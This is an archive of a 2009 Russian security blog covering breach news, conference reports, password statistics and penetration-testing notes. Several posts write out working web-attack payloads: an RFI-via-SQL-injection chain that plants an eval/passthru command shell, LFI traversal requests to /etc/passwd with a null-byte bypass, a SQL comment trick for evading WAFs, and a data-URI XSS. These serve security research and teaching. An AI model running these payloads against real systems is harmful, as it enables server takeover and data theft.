С наступающим 11111011010 годом!
Скомпрометированы более 32 миллионов учетных записей (последствия атаки на сайт RockYou.com)

Обезличенная база паролей (без логинов, email’ов и другой чувствительной информации) была опубликованна на rapidshare.com, но на данный момент уже удалена и доступна только в торентах. Стоит заметить, что произошедший инцидент сумел попасть в TOP5 самых громких в уходящем году случаев утечки данных.
Intel website hacked
Поверхностно пробежавшись по доступным таблицам, наш герой заметил хранящиеся пароли администраторов в plain-тексте, а также таблички с яркими именами колонок, говорящими сами за себя: id, card_type, passport_dob, passport_number, passport_issue, passport_expiry, passport_nationality, passport_name, phone_number_cell, address1, city, card_issue_number, card_expire_date, card_cvv.
Поломали Twitter


Безопасность языком цифр #7

Проводя анализ защищенности конфигурации клиентов в тихом режиме (респект Валере Марчуку), при посещении web-узла, указанного в электронном сообщении, в этом году получены следующие данные:

То есть, от 20% до 35% компьютеров позволяют выполнить произвольный код и до 85% компьютеров содержат уязвимости различной степени критичности. Само по себе, выполнение произвольного кода внутри защищаемого периметра на целевых объектах, в ряде случаев позволяет сменить тип атакующего с внешнего нарушителя на внутреннего.
RFI over SQL Injection/Cross-Site Scripting
- Пользовательский сегмент, из которого работает атакующий (я в его роли);
- Технологическая сеть, трафик из которой жестко режется;
- Уязвимое Web-приложение к Remote File Including (RFI), расположенное в технологической сети;
- Уязвимое Web-приложение к SQL-инъекции, аналогично дислоцирующееся в технологическом сегменте сети.
Сама по себе SQL-инъекция не позволяла реализовать какие-либо полезные угрозы для развития атаки (вот она страшная сторона минимизации привилегий!). Воспользоваться уязвимостью RFI тоже не удалось, потому, как исходящий трафик из технологической сети жестко резался в пользовательский сегмент и во внешний мир. Для того, чтобы проэксплуатировать уязвимость RFI, была воссоздана приблизительно следующая цепочка:
http://<уязвимое_приложение_к_RFI>/?param=http://<уязвимое_приложение_к_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');
Т.е., по отдельности все три уязвимости были бесполезными. И лишь объединившись для единой благой цели, позволили реализовать угрозу ИБ – выполнение команд на сервере:)

В общем-то, ничего сверхъестественного, но мне подобная атака показалась очень даже забавной...
Kaspersky Websites Hacked (round two)


Сайты NASA подверглись хакерской атаке

Как можно понять по приведенному выше скриншоту в качестве базы данных используется MySQL v.5.x, которая запущена под Windows 2/3k. Права пользователя, по всей видимости, не позволяют работать с файловой системой, но классическая инъекция под 5-м мускулем – это всегда очень приятно:) т.к. позволяет легко и просто восстановить всю структуру базы и после, не спеша, дампить содержимое всех таблиц в пространстве СУБД, до которых позволяют дотянуться права на основе таблицы разграничения доступа.
Материалы с мастер-класса по SQLi на Hackday#2
На мероприятии уже ближе к вечеру я провел мастер-класс по теме "Внедрение операторов SQL". "Велосипед" на этот раз не выдумывал (а его от меня там и не требовали), а просто воспользовался наработками, которые в свое время готовились для института МИФИ. Собственно, материалы мастер-класса, который по времени уместился в один час, представлены ниже.
Symantec has been hacked
Zero-day: Microsoft Internet Explorer
Metasploit Framework 3.3 Released

Подробности новой сборки.
Мероприятие: Платформа 2010
Даже при загруженности по работе, как 20/7 (4 на сон) я не мог пропустить пафосное мероприятие проводимое компанией Microsoft под названием "Платформа 2010". В этом году дислоцировалась Платформа в том же месте, что и Cisco Expo 2009, вместо уже привычного всем Ленинского проспекта (видимо решили сэкономить). Однако стоит сказать, что в отличие от Cisco, Microsoft развернулась, чуть ли не на все здание! Прогуливаясь по бесконечным коридорам отеля, семинары можно было встретить в самых неожиданных местах, впрочем, как и ребят в футболках, выполняющих роль проводников по зданию (а сколько там было security-парней! Чувство, что находишься в хранилище банка). Но об этом я узнал только потом. Первоначальной целью было посещение центра бесплатной сертификации от УЦ Ланит;)
Анализ защищенности Web-приложений
Обзорная презентация по уязвимостям Web-приложений
Вот и дожили до кириллических DNS-имен

Осознав, что вот и пришло время кириллических DNS-имен, первым делом проверил привычные инструменты:
ВАФ! Kaspersky тоже вроде WAF

Подобное сообщение можно увидеть, когда запрос содержит следующие ключевые слова и именно в такой последовательности:
/?id=1 union select password from users
Advanced SQL Injection lab (full pack)
Оригинал презентации:
Еще один красивый способ эксплуатации SQL Injection в обход WAF
/*!sql-code*/ и /*!12345sql-code*/
Как можно догадаться, и в том, и в другом случае sql-code будет выполнен из комментария! Во втором случае конструкция означает, что нужно выполнить "sql-code", если версия СУБД больше этого цифрового значения.
Advanced SQL Injection
RIW //09: RUSSIAN INTERNET WEEK
Кстати, мероприятие проходило в том же месте, что и INFOSECURITY в далеком 2008 г. Из компаний в индустрии информационной безопасности присутствовала только "Лаборатория Касперского" на стенде которой был замечен Jackee Chan из известного ролика :-)
Позитивные вебинары
В рамках вебинаров, проводимых 1С-Битрикс/Lexton
Аудитория: Менеджеры, CIO, специалисты в области ИТ/WEB
29 октября 2009 11:30 - 12:30 "Актуальные угрозы Web-приложений"
Безопасностью Web-приложений большинство Компаний занимается по остаточному принципу. Такое положение вещей привело к тому, что в настоящее время внимание атакующего в первую очередь направлено на эксплуатацию уязвимостей именно в подобного рода сервисах. Незащищенный сайт является "лакомым кусочком" для злоумышленника. А возможные финансовые потери Компании, в случае успешной атаки, варьируются в широком диапазоне.Докладчики: Евтеев Дмитрий, Александр Бородин (Lexton)
На вебинаре будет представлена Российская статистика уязвимостей Web-приложений. Будут озвучены наиболее часто встречаемые проблемы и недостатки при проектировании и использовании Web-приложений, а также возможные пути снижения рисков, связанных с угрозами в отношении Web-сервисов.
В рамках онлайн-конференции iCoder
Аудитория: Разработчики, программисты, специалисты в области ИБ
2 ноября 2009 10.00 - 12.00 "Security Development Lifecycle – задачи, методика построения, результаты"
- Наиболее типичные ошибки программирования. (CWE/SANS Top 25 Most Dangerous Programming Errors)
- Необходимость внедрения SDL
- Microsoft Security Development Lifecycle:
- Основные положения
- Стадии Microsoft SDL - Технические средства, используемые в SDL:
- Инструменты статического анализа
- Защищенные версии наиболее опасных функций.
- Опции компилятора, повышающие стойкость приложений к различным видам атак
- Инструменты динамического анализа
- Утилиты Fuzz-тестирования
5 ноября 2009 12.00 - 14.00 "Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях"
Анализ защищенности Web-приложений – теория и практика.Докладчики: Дмитрий Евтеев, Александр Анисимов
Уязвимости и атаки на Web-приложения, общепринятые классификации уязвимостей. Ошибки, допускаемые разработчиками при создании клиентской и серверной частей Web-приложения, их возможные последствия и методы выявления и устранения. Примеры из практики. Обзор специализированных средств защиты Web-приложений: Web Application Firewall (WAF). Стоит ли полагаться на WAF?
Методология выявления уязвимостей в Web-приложениях, в частности, с использованием различных средств автоматического анализа.
Дополнительно более детально будут рассмотрены современные методы эксплуатации уязвимостей в Web-приложениях, такие как: HTTP Parameter Pollution, HTTP Parameter Fragmentation, Anti DNS Pinning и др.
WASC Announcement: 2008 Web Application Security Statistics Published
Публикация содержит обзорную статистику уязвимостей Web-приложений, полученную в ходе работ по тестированиям на проникновение, аудитов безопасности и других работ, проводимых Компаниями, входящими в консорциум WASC в 2008 году. Всего статистика содержит данные о 12186 сайтах, в которых было обнаружено 97554 уязвимости различной степени риска.
В результате собранных данных было получено 4 набора данных:
- суммарная статистика по всем видам работ;
- статистика по автоматическому сканированию;
- статистика по оценке защищенности методом черного ящика;
- статистика по оценке защищенности методом белого ящика.
Анализ полученных данных показывает, что более 13% всех проанализированных сайтов может быть скомпрометировано полностью автоматически. Около 49% Web-приложений содержат уязвимости высокой степеней риска (Urgent и Critical), обнаруженные при автоматическом сканировании систем. Однако при детальной ручной и автоматизированной оценке методом белого ящика вероятность обнаружения таких уязвимостей высокой степени риска достигает 80-96%. Вероятность же обнаружения уязвимостей степени риска выше среднего (критерий соответствия требованиям PCI DSS) составляет более 86% при любом методе работ. В то же время при проведении более глубокого анализа 99% Web-приложений не удовлетворяет требованиям стандарта по защите информации в индустрии платежных карт.
Cisco Expo 2009: Впечатления от мероприятия
Сразу хочу сказать, что от подобного мероприятия ожидал чего-то большего. И в целом, проходящая в этом году конференция Cisco Expo несколько разочаровала. И кухня была не такой пафосной, как в прошлом году, и стенд Positive Technologies был расположен в трудно отыскиваемом месте под лестницей... выступления, несомненно, были интересными, но видимо я пришел туда в неудачное время. Ну а так, как стенд Positive Technologies был свернут во второй день проведения мероприятия (нас не замечали под лестницей:-(( ), а знакомых лиц по близости не наблюдалось, то и мое пребывание на выставке было недолгим.
Про тонкую грань вредоносности ПО

Как вы понимаете, никакого троянца там и в помине нет. Просто файл "http.vsp" является модулем работы с протоколом HTTP. Для интереса ради, провел через Virustotal тот же файл из последней сборки XSpider 3230. Результаты такие.
Использование Null-byte в цифровых сертификатах

Phishing
Андрей Абрамов (aka Stinger) дал свои комментарии радиостанции BBC в контексте phishing-угроз:
И в продолжение темы, небольшая статистика по фишингу от IBM.
С какой стороны ждать беды

65% инцидентов – это атака внешним злоумышленником и банальная потеря данных (ноутбука, ленты, etc). Повышенное внимание к собственным сотрудникам, которым "в теории" проще украсть данные, ослабило бдительность в отношении внешних нарушителей. Угроза со стороны внутреннего "нарушителя" (именно нарушителя, как минимум вора, а не простого разгильдяя) несколько преувеличена. Сотрудник подписал множество документов при приеме на работу. Его ознакомили с политикой ИБ, используемой в компании. Пояснили, что все действия контролируются и мониторятся. В здравом уме далеко не каждый, готов будет совершить "подвиг". Его может остановить, простая логическая мысленная цепочка о том, что подобные действия не останутся незамеченными. Кроме того, сдерживающим фактором будет являться то, что разного рода "подвиги" будут отражены в трудовой книжке, что в свою очередь в значительной степени может усложнить дальнейшее существование (примеры есть. говорю не про себя:-)). Чего не скажешь про неуправляемого внешнего нарушителя, скрывающегося за ботнетом на другом континенте...
Анализ паролей пользователей Windows Live Hotmail
Итак, во-первых, список опубликованных и отсортированных (без повторений) учетных записей начинается с буквы "a" и заканчивается буквой "b". Это свидетельствует о том, что полный список пользователей куда больше опубликованного в сети. Если предположить, что на каждую первую букву английского алфавита в списке приходится порядка 4.000-5.000 записей, то не трудно подсчитать, что полный список скомпрометированных учетных записей может достигать 150.000.
Во-вторых, из опубликованного списка в 10.028 записей, только 9.238 являются корректными. Если еще учитывать ограничивающую политику Hotmail, накладываемую при задании паролей (длина паролей не должна быть менее 6-ти символов), то результирующее количество "правильных" учетных записей в опубликованном списке содержится всего 8.250.
Насколько законны действия пентестера?
INFOSECURITY 2009: Впечатления от посещения выставки
В первую очередь стоит отметить, что на фоне предыдущих нескольких лет, INFOSECURITY 2009 выглядела весьма и весьма экономно. Оно, безусловно, понятно – мировой финансовый кризис. Поэтому не наблюдалось ни одного человека с ярко зелеными пакетиками от Dr.Web, которые пестрили в прошлые годы. Впрочем, и аналогичные пакеты красного оттенка с логотипом Лаборатории Касперского в руках посетителей выставки также отсутствовали. Масштабы выставки сократились. Стендов многих известных системных интеграторов и вендоров, которых можно было встретить в прошлые годы, не наблюдается. А само мероприятие проходит в трудно отыскиваемом павильоне под номером 7 Экспоцентра на Красной Пресне. Халявы стало меньше, но хватит о грустном:)
Прохождение CC2009 hack quest
Об SQL Injection с улыбкой
Источник: http://spacel0rd.livejournal.com/426568.html
Vista BSOD 0day
А у меня все никак руки не доходили перезагрузить свою машину... так что проверено на себе, it works :)
Ссылки:
http://pentestit.com/2009/09/08/windows-vista-smb-remote-request-day/
http://security-sh3ll.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html
CC’09 завершен, Hack Quest продолжается!
http://download.securitylab.ru/cc09.part01.rar
http://download.securitylab.ru/cc09.part02.rar
http://download.securitylab.ru/cc09.part03.rar
http://download.securitylab.ru/cc09.part04.rar
Не случилось ли чего с nmap.org?

Причем, к странице загрузок доступ есть:

HTTP Parameter Fragmentation (HPF) – один из способов обхода фильтров безопасности в Web-приложениях
Достаточно часто требуется, чтобы в один SQL-запрос попадало два и более параметра со стороны пользователя, например:
Query("select * from table where a=".$_REQUEST ['a']." and b>".$_REQUEST ['b']);
Query("select * from table where a=".$_REQUEST ['a']." and b<".$_REQUEST ['b']." limit ".$_REQUEST['c']);
и т.д.
Социальная сеть Facebook взломана. И вновь - SQL-Injection!


Chaos Constructions '2009 (CC09) – подводя итоги
Мероприятие прошло на позитивной волне (фотки), многие работы (демо && realtime coding) произвели на меня сильное впечатление и оставили приятный шлейф, что присутствую в этом коллективе. Вообще, безусловно, не часто встретишь столько талантливых людей в одном месте. Атмосфера на фестивале была замечательная! Но и имели место быть разного рода косяки с падением каналов и пр. в том числе в хак-зоне... Но они, конечно же, не могли испортить хорошего настроения, в котором все прибывали :)
Методы обхода Web Application Firewall
Разработчики подобных фильтров обещают наиболее простое и дешевое решение "от всех проблем", а администраторы (в очередной раз) искренне верят в неприступность собственных систем. Но как будет рассказано на выступлении, WAF - это не долгожданная "серебряная пуля". Как и все, что создано человеком WAF имеет недостатки, которые позволяют воспользоваться уязвимостями даже на самых защищенных серверах.
YAHOO! взломали через банальную SQL Injection

Использование замены null-byte в реальных условиях
Примеры разберем на up to date системе FreeBSD (7.2-RELEASE-p3) с php (5.2.10 with Suhosin-Patch 0.9.7).
<? include("q/".$_GET['f'].".txt"); ?>
Для выполнения атаки работает: /?f=../../../../../etc/passwd/.[N]/.
, где /.[N]/. - repeat("/.", 487)
<? include("qq/".$_GET['f'].".txt"); ?>
Предыдущий URL не позволит получить /etc/passwd. Но такой запрос успешно отработает:
/?f=/../../../../../etc/passwd/.[N]/.
<? include("qqq/".$_GET['f'].".txt"); ?>
Аналогично, предыдущий URL не позволит получить доступ к файлу. Сработает первый запрос: /?f=../../../../../etc/passwd/.[N]/.
и т.д. То есть, существует прямая зависимость между началом запросов выхода за каталог "../" и "/../" (кратная двум) от начала поступающих данных в функцию include(),require(), etc.
Другой пример кода:
<? include($_GET['f'].".txt"); ?>
Предыдущие запросы идут лесом. Отработает следующий URL:
/?f=non/../../../../../etc/passwd/.[N]/.
Таким образом, при эксплуатации LFI с использованием метода по обходу null-byte могут использоваться следующие запросы: "any/../file[N]", или "../../file[N]", или "/../../file[N]", где [N] замена null-byte, характерная для атакуемой ОС.
Web Hacking Incidents Database
В первую очередь, хотелось бы отметить Web Hacking Incidents Database (WHID), поддерживаемую и регулярно пополняемую консорциумом Web Application Security Consortium (WASC). Также, на мой взгляд, интересную статистику по тому же направлению предлагает компания Breach Security (данные по инцидентам за 2008 г./2009 г.).
Здесь наиболее оригинальное использование уязвимости в Web-приложении :) Хороший пример, насколько может быть опасно, в финансовой форме, нарушение целостности информации на сайте компании. Тут, продолжение истории.
И успешные пафосные атаки на web из недалекого прошлого: атака на MI5 и взлом почти статического сайта Кевина Митника :)
Сбор информации, как ключевой этап тестирования на проникновение
Действия атакующего (и пентестера) обычно разделены на следующие этапы:
- Пассивный сбор информации;
- Анализ собранной информации;
- Активный сбор информации;
- Проведение атаки.
При этом сбор и анализ информации, а также корректировка выбранных способов проникновения в информационную систему многократно могут повторяться. Первоначальный же сбор информации во многом является ключевым элементом проведения успешного и правильного пентеста. От того, насколько скрупулезно он был осуществлен, может зависеть, как эффективность пентеста в целом, так и эффективность отработки отдельных векторов атаки (социальная инженерия, брутфорс, атака на Web-приложения и пр.).
Выдержит ли Blogger.com DDoS?

Как теперь (мне) стало понятно, по всей видимости, гугль и не так уж и успешно справляется с DDoS-атакой, от которой уже падали ЖЖ, Facebook и Twitter. Подробности тут.
Интересные раскопки

Mozilla Firefox придерживается аналогичного мнения:

Russian Business Network
Забавный Microsoft

Забавная ситуация, но сердце екнуло:-))
Chaos Constructions '2009 (CC9)
Кроме HackQuest, команда Positive Technologies также принимает участие в проведении конкурса по обходу проактивного фильтра WAF, работающего под CMS Bitrix. В частности я занимаюсь тем, чтобы коммуникатор не получил никто:)) либо получил не за взлом, а в качестве поощрительного приза... Конкурс по обходу Bitrix WAF проходит в рамках фестиваля CC09, но также будет доступен из сети Интернет. Следите за новостями и welcome!
Атака на Active Directory
Потому в очередной раз напоминаю, что в доменной архитектуре локальная учетная запись не требуется! И даже будучи отключенной, она доступна при загрузке в безопасном режиме.
PS: действо с отключением локальной учетной записи администратора вовсе не означает, что для нее не нужно регулярно менять используемый пароль, т.к. стоит только немного расслабиться, как инсайдер задерживаясь на работе дольше остальных, начнет сливать информацию с чужих компьютеров, загружаясь в безопасном режиме:)
Оригинальный Cross-Site Scripting
Используете Opera или Firefox 3.x? Тогда копипастим в адресную строку следующее:
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

Вроде ничего страшного? Однако, подобная "фича" этих браузеров может реально использоваться "в живой природе" для проведения вполнее себе пригодной атаки Cross-Site Scripting.
ЗЫ: для тех же целей также работает следующая конструкция «javascript:window.location = "http://www.google.com/"»
ВКонтакте, QIP, Who following?
Анализ паролей пользователей ВКонтакте (поправка)
Анализ паролей пользователей ВКонтакте
NMAP наше всё
# Nmap done: 1024 IP addresses (73 hosts up) scanned in 67.75 seconds
Аналогичный скан nmap версии 4.76:
# Nmap done: 1024 IP addresses (73 hosts up) scanned in 2012.50 seconds
То есть, скорость дефолтового сканирования увеличилась на 97%. Подобное быстродействие не может не впечатлять. Ну а какова цена такой производительности? Сравнив модной тулзой ndiff (входящей в состав nmap 5.x) два скана и подсчитав результаты, было получено, что 5% открытых портов пропущено последней версией nmap. Для многих целей, подобная цифра будет приемлемой, потому впечатление от последнего релиза сетевого сканера небольшой процент false positive ничуть не испортил.
7 zero-day (code exec) в продуктах Adobe, кто больше?

С другой стороны, начинаю задумываться о том, что изолированная среда вовсе не выход, а стоит покупать второй ноут;)
http://www.microsoft.com/technet/security/bulletin/MS07-049.mspx
http://www.vupen.com/english/advisories/2007/2873
http://lists.vmware.com/pipermail/security-announce/2009/000055.html
http://communities.vmware.com/thread/209319
Immunity CANVAS Professional 6.47 (CVE-2009-1244): http://www.immunitysec.com/news-latest.shtml
Немного полезных ссылок по анализу защищенности Web-приложений
Текущая классификация уязвимостей Web WASC WSTCv2 - http://projects.webappsec.org/Threat-Classification-Working
Оф. сайт - http://www.webappsec.org/
Международная статистика уязвимостей - http://www.webappsec.org/projects/statistics/
Open Web Application Security Project (OWASP):
OWASP Testing Guide V 3.0 - http://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents
TOP 10 наиболее распространенных уязвимостей в Web - http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Из дополнительных вкусностей - болванки сигнатур для статического анализа кода, подборка утилит (1,2) для проведения различного поиска уязвимостей в Web-приложениях.
Positive Technologies:
Российская статистика уязвимостей – 2008, 2007, 2006
Возвращаясь к анализу слабых паролей

Еще один 0day с Adobe


Зачем нужен пентест?
Ценность тестирования на проникновение состоит в возможности смоделировать последовательность выполняемых действий потенциальным злоумышленником, в условиях, максимально приближенных к реальности. Это позволяет выяснить, где безопасность работает хуже, а где лучше, выявить наиболее уязвимые места в информационной системе, причины и следствия успешной атаки (если она была реализована), а также проверить надежность существующих механизмов защиты в целом.
Подборка ресурсов для проведения оценки средств поиска и эксплуатации уязвимостей
– Широко известный дистрибутив DVL (Damn Vulnerable Linux), не требующий комментариев
– Сборка Moth, содержащая наборы уязвимых сценариев Web-приложений. Авторы предполагают использование своего творения под цели:
- Проведения тестирования сканеров Web уязвимостей;
- Тестирование статических и динамических анализаторов;
- Использование дистрибутива при проведении соответствующего учебного курса.
- Сборка Web Security Dojo - http://sourceforge.net/projects/websecuritydojo/
- Сборка Damn Vulnerable Web App (DVWA)
- Сборка от Google - Web Application Exploits and Defenses
Stand-alone сборки уязвимых Web-приложений:
– OWASP SiteGenerator
– OWASP WebGoat
– OWASP Vicnum
– OWASP InsecureWebApp
– Stanford SecuriBench
– SecuriBench Micro
– Mutillidae
– ButterFly
– HacmeBank
– BadStore
Древние сборки реальных приложений (в частности WEB):
- http://www.oldapps.com/
Подборка аналогичных online-ресурсов:
– Тестовые сайты от Acunetix (PHP, ASP, ASP.NET)
- Тестовый сайт от NT OBJECTives
- Тестовый сайт от SPI Dynamics (теперь уже от HP)
- Тестовый сайт от компании IBM
- И тестовый сайт от Cenzic
Юридическая сторона пентеста
Тот факт, что владелец информации и оператор ИС дал своё согласие на проведение атаки освобождает пентестера от ответственности по ст.272 УК, но никак не влияет на квалификацию действий пентестера по ст.273 УК. То есть, "вредоносные программы вне закона всегда".
Sniffing по электросети
Источник: www.xakep.ru
Появился zero-day к OpenSSH?
Возможно "утка", но появилось сообщение от SANS, что в прошлую пятницу зафиксировано использование zero-day, выполняющего аналогичные действия по получению рута через OpenSSH. Эксплуатация была произведена на последней версии демона.
Потому, всем параноикам рекомендую закрыть ssh файрволом, как лекарство от лишних угроз:)
Ссылки по теме:
http://romeo.copyandpaste.info/txt/nowayout.txt
http://security-sh3ll.blogspot.com/2009/07/openssh-0day.html
http://seclists.org/fulldisclosure/2009/Jul/0028.html
http://www.securityaegis.com/?p=445
milw0rm прекращает свое существование

Что тут еще можно добавить? Достойных ресурсу milw0rm в настоящее время попросту нет. Остается только надеяться, что придут новые люди, которые не дадут проекту загнуться в одночасье. Ну а пока, сайт milw0rm.com недоступен.
Источник: securitylab.ru
Безопасность языком цифр #6
Приведу пример. У нас имеется метрика, что 40% паролей можно взломать из-за простоты, а в Компании не используется каких-либо превентивных мер в отношении противодействия атакам удаленного подбора паролей и при этом имеются внешние сервисы, использующие однофакторную аутентификацию с использованием парольной фразы (Mail, Web-сервисы, SAP, VPN, etc.). Таким образом, угроза, связанная с компрометацией паролей пользователей, должна получить высокий уровень опасности в качественной модели управления рисками.
ИБ в госсекторе у нас и за рубежом
Прогуливаясь сегодня по новостным ресурсам, мое внимание привлекла новость на xakep.ru, относительно результатов проведенного аудита ИБ государственного пенсионного фонда Миннесоты. Дело в том, что перечисленные проблемы ИБ, выявленные зарубежными коллегами, аналогичным образом наблюдаются и у нас в России. Это следующие недостатки: "…плохо сконфигурированные файрволы и беспроводные сети, слабые пароли и отсутствие общей системы управления безопасностью, способной реагировать на изменение типов угроз".
Особенно улыбнуло схожесть подходов, как у нас, так и за рубежом: "…исполнительного директора пенсионного фонда Миннесоты Дэвида Бегстрема данная информация не удивила" и "…сотрудники фонда считают, что добились в этом вопросе существенных успехов…".
Не стану комментировать, каких таких "успехов" могли добиться сотрудники фонда Миннесоты при полученных результатах аудита, потому как воочию видел подобного рода "успехи". Но, к сожалению, такие "успехи" и подходы со стороны руководства приводят к реальным утечкам конфиденциальной информации, как у них, так и у нас.
Возвращаясь к теме слабых паролей
В проведенном исследовании проблем парольной защиты, я неоднократно использовал термин "слабые", не стойкие к взлому пароли. А что же тогда можно считать стойким паролем?
По моему личному убеждению, минимально стойким паролем является такой пароль, который удовлетворяет всем следующим требованиям:
• должен содержать символы нижнего и верхнего регистра, цифры, специальные символы и знаки препинания;
• должен быть не менее 8 символов;
• не должен полностью или частично совпадать с логином, например – admin/admin, admin/admin1 и т.д.;
• не должен образовывать цифро-буквенные простые последовательности, например – "abcd12345","aabb2255", "QQrTTr55" и т.п;
• не должен являться словом из словаря, сленга, диалекта, жаргона и т.п.
• не должен являться персональной информацией (имена членов семьи, адреса, телефоны, даты рождения и т.п.).
Методика оценки соответствия ИБ по СТО БР ИББС-1.2-2009
Определение уровня соответствия ИБ требованиям СТО БР ИББС-1.0 по этой методике происходит путем оценки следующих основных направлений:
— менеджмент ИБ организации;
— текущий уровень ИБ организации.
Также весьма полезным в представленной методике является рассчитанный «Коэффициент значимости частного показателя ИБ» по каждому оцениваемому критерию СТО БР ИББС-1.0.
Статистика используемых паролей пользователями в Российских компаниях
С полными результатами проведенного исследования можно ознакомиться в разделе "Аналитика" на официальном сайте Positive Technologies.
ЗЫ: Неоценимую помощь в проведении исследования и своими креативными идеями помогал мой руководитель по работе и просто позитивный человек – Сергей Гордейчик.
Выполнение команд на сервере в функции eval()
На этапе проведения сканирования, в поле зрения попало следующее сообщение об ошибке:

Уязвимый код (полученный по окончании работ):
...
if($_CONFIG["STATUS"]) eval(mkPHPeval($TMP));
...
Немного статистики
Портрет участников
В проведенном опросе приняло участие более 500 участников. Анализ портрета респондентов по количеству компьютеров в организации показал, что наибольшая доля опрошенных респондентов (57%) приходится на малый бизнес (менее 100 компьютеров). Вторая по численности группа респондентов попала в категорию от 100 до 1000 компьютеров в организации (26%). Третья и четвертые группы – это представители крупного бизнеса и Федеральных госструктур. Их распределение более 3000 (11%) компьютеров для третьей и 1000 – 3000 (6%) компьютеров для четвертой группы соответственно. Примечательно, что представителей очень крупного бизнеса (более 3000 компьютеров), принявших участие в опросе, оказалось больше на 5%, чем представителей менее крупного бизнеса (1000 – 3000 компьютеров в организации).
Безопасность языком цифр #5
Если же рассматривать совокупное число выявляемых уязвимостей по всем сканируемым системам (ОС, сетевое оборудование, СУБД и пр.), то ~34% из их числа в отношении Web-приложений связаны с несоблюдением парольной политики и ~32% уязвимостей возникают из-за проблем в конфигурации Web-приложений.
Server-side с ModRewrite
Эпизодически приходится сталкиваться с уязвимостями различной степени критичности, в web-приложениях использующие mod_rewrite. Это связано с тем, что безопасность приложения в подобных случаях пытаются обеспечить модулем Apache, но при этом задают неточные регулярные выражения. Так, использование директивы RewriteRule с "кривым" regexp:
Безопасность языком цифр #4
Уязвимости в СУБД составляют 5% от общего числа всех выявляемых недостатков во внутренних информационных системах при их обследовании.
LOPHTCRACK IS BACK
Насколько часто встречается уязвимость SQL-Injection?
Заметка об антивирусах
Итак, во-первых, я искренне сочувствую домашним пользователям:) При активном серфинге сайтов эротического содержания с правами локального администратора, никакое антивирусное средство, увы, не спасет. Добавив к этому грамотность среднестатистического домашнего пользователя в вопросах обеспечения информационной безопасности, как у компьютера остается слишком мало шансов сохранить себя в первозданной чистоте без различного рода паразитов. Тут и ярко выраженный человеческий фактор, и проблемы с патчменеджментом, и работа с повышенными привилегиями и т.п. Безусловно, вендоры за последние несколько лет двигаются семимильными шагами, но, даже будучи очень бдительным и подкованным домашним пользователем, подцепить какую-нибудь заразу, когда компьютер используется в качестве развлекательного ресурса, достаточно просто. Подтверждением тому служит то, что опорную сеть крупных ботнетов составляют именно компьютеры домашних пользователей:) Сама идеология такого пользователя такова, что вроде как секретов на компьютере нет, потому и нет ничего страшного в том, что компьютер поучаствует в распределенной DoS-атаке... К сожалению, достаточно часто слышу подобную позицию.
Безопасность языком цифр #3
Наибольшее число проблем, связанных с несоблюдением парольной политики во внутренних сетях, встречается в сетевом оборудовании - 49,3%. А наиболее печальная ситуация с процессом установления обновлений безопасности замечено у используемых Web-приложений - 44,3%.
И нет конца борьбы со спамом

В полученном письме меня поблагодарили за борьбу с международным спамом:)

Проследовав по предложенной ссылке, передо мной извинились от лица всех ботов (особенно улыбнуло;)), но сказали, что меня ожидает ручная верификация...

Однако забавно даже то, что данный пост удалось опубликовать без труда (капча не в счет), а говорилось, что «я не могу публиковать новые сообщения, пока блог не будет разблокирован». Небольшие формальные несоответствия, но в целом...